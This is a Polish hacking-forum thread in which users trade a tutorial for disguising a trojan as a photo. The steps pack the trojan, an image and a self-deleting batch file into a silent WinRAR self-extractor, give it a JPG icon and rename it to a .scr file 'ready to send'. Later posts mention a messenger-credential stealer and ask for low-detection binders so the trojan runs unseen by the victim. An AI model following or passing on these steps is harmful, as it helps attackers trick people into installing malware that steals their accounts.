batch usunie rozpakowane pliki tylko napisz go poprawnie...
batch usunie rozpakowane pliki tylko napisz go poprawnie...
dobrze go napisalem
mialem pliki lol.jpg lol.exe i plik.bat
a kod wygladal tak :
moze te komentarze usunac?Kod:echo off del lol.jpg // usuwa fotke del plik.bat // usuwa samego siebie del lol.exe // usuwa trojana
:whoeva: :whoeva:
za co ty masz te 14 razy "pomógł" :whoeva: :whoeva: :whoeva:Kod:echo off del lol.jpg del plik.bat del lol.exe
już chce mi sie śmiać jak w podpisach macie "wciśnij pomógł"co wam o tym punkciku
![]()
wkoncu sie ma to cos ^^ :whoeva:
przy otwieraniu pliku *.scr wyskakuje blad i dalej sie wypakuje all a jak klikne wypakowany plik.bat to usuwa zdjecie i samego siebie
:glupek2: Musiałeś coś pomieszać w komentarzach... może napisze tutek jak zrobić taki plik ale nie chce mi sie na razie
// Napisałem mini TuT macie
__________________________________________________ ___________
WinRar...? Binder...!
1. Po pierwsze musimy mieć plik który jest trojanem zakładamy że nazywa się "trojan.exe"
2. Musimy znaleźć fotkę która będzie otwierała się razem z trojanem, obojętnie jaką, można ściągnąć jakąś z internetu...
3. Tworzymy nowy folder "Nowy Folder" do którego pakujemy oba pliki, "fotka.jpg" oraz "trojan.exe"
4. Otwieramy systemowy notatnik i piszemy w nim następujący kawałek kodu:
następnie zapisujemy plik pod nazwą "batch.bat" i wrzucamy do "Nowy Folder" tam gdzie pozostałe pliki.Kod:echo off del fotka.jpg del trojan.exe del batch.bat
5. Zaznaczamy wszystkie 3 pliki i klikamy PPM z menu wybieramy "Dodaj do archiwum..."
6. Zaznaczamy "Utwórz archiwum SFX"
7. Następnie przechodzimy do zakładki "Zaawansowane" w której wybieramy "Opcje SFX..." w oknie które nam sie pokazało przechodzimy do zakładki "Tekst i ikona" a następnie klikamy na przycisk "Przeglądaj" znajdujący się OBOK NAPISU "Załaduj ikonę z pliku". Szukamy ikony(rozszeżenie .ico) pliku .jpg i dodajemy ją, następnie klikamy "OK". Następnie przechodzimy do zakładki komętarz i w oknie "Wpisz komentarz" wpisujemy tak:
Po wpisaniu komentarza naciskamy na "OK" i czekamy aż plik się spakuje, w wyniku czego powinniśmy otrzymać plik "Nowy Folder.exe". Pozostała jeszcze zmiana nazwy i rozszerzenia pliku.Kod:Silent=1; Setup=trojan.exe; Setup=fotka.jpg; Setup=batch.bat;
8. Archiwum który utworzyliśmy wrzucamy na dysk C:
9. Otwieramy CMD (Start->Uruchom->Wpisujemy "CMD"). W CMD piszemy "COPY C:/Nowy Folder.exe C:/Zdjecie_004.scr" i dajemy ENTER. Wchodzimy na dysk C: i tam powinniśmy mieć plik o nazwie "Zdjecie_004.scr" i ikonie pliku .jpg
KONIEC !! Plik gotowy do wysłania![]()
nie wiem co robie nie tak, ale mi nadal wywala błąd, że nie może odnaleźć pliku :kreci: i wypakowuje pliki obok dopiero jak klikne na batch zostaje tylko fotka i nowy folder.exe
u mnie wszystko śmiga jak należy![]()
Originally posted by lisek160
:whoeva: :whoeva:
za co ty masz te 14 razy "pomógł" :whoeva: :whoeva: :whoeva:Kod:echo off del lol.jpg del plik.bat del lol.exe
już chce mi sie śmiać jak w podpisach macie "wciśnij pomógł"co wam o tym punkciku
patrzcie za co kochany kangurek dostał reputki..Originally posted by KangurX
wkoncu sie ma to cos ^^ :whoeva:
przy otwieraniu pliku *.scr wyskakuje blad i dalej sie wypakuje all a jak klikne wypakowany plik.bat to usuwa zdjecie i samego siebie
posty typu:
Oooo no to fajnie ^^[/b]to napisz jaka ;][/b]Program wypas gratulacje dla autora ;][/b]@lisek160prosze o rehosta tego linku na megaupload albo na rapida bede bardzo wdzieczny bo link juz wygasl ;][/b]
śmiga ładnie, dzięki![]()
to nie za to, tylko goscie mnie nie znalezli to dali na byle jaki post ;]
(o ten rehost co prosilem to jest to) reszta to od czegos innego "pomógł"
Sam sie dziwie
nie wiem co jest nie tak siedze i siedze zrobić nie mogę :glupek2:
a mnie qrna ikona sie zmienia po zamianie na src:(
Witam!![]()
Mam kapecke problemWiec postanowiłem odświeżyć topic
Mam nadzieje, że ktoś z forumowiczów będzie w stanie mi pomóc
Postępuje dokładnie z poradnikiem, ale gdy klikam na gotowy pliczek scr... Występuje błąd... Mianowicie nie można odnaleźć plików... Wszystkich trzech, które były pakowane SFX
Następnie pojawiają się i... To wszystko.. Nic się nie dzieje... Nie otwiera sie ani trojan (Złodziej GG v1.1) ani jpeg...
![]()
Chciałbym aby efektem końcowym mojej pracy był plik scr, który po otwarciu otworzy obrazek, a w tle bez zadnej informacji dla użytkownika otworzy sie trojan i porobi co trzebaProszę o pomoc! Oczywiscie w gre wchodzą inne bindery( oczywiscie o jak najmniejszej wykrywalnosci) chodzi tylko o to aby efekt końcowy był taki jak mnie interesuje
![]()
wiele się pisze na tym forum jak zbindować rarem, ale czemu nikt nie nakręci filmiku. Chętnie bym zrobił taki filmik ale jestem zalatany i nie mam czasu a wieczorem mówiąc szczerze jestem zbyt zmęczony. Jeden filmik by wystarczył i zniknęły by rozmowy na temat jak zbindować pliki rarem.
Problem udało mi się rozwiązać samemuNa szczęście...
Co do pomysłu z filmem świetna sprawa, samo bindowanie rarem nie jest czyms strasznym, ale początkujący ( w tym Ja
) może sprawić trudnośc kodowanie archiwum
![]()
<div class='quotetop'>CYTAT(Harpagan @ 15.05.2008, 12:31) <{POST_SNAPBACK}></div>Mam taki sam problem jak ty jesli bylbys na tyle mily i moglbys powiedziec co jest nie tak to bylbym wdziecznyProblem udało mi się rozwiązać samemuNa szczęście...
Co do pomysłu z filmem świetna sprawa, samo bindowanie rarem nie jest czyms strasznym, ale początkujący ( w tym Ja
) może sprawić trudnośc kodowanie archiwum
[/b]
najpierw siedzialem 2h przy ostatnim punktcie bo nie chcialo mi sie skopiowac a teraz to aff z gory dziekuje
KALI~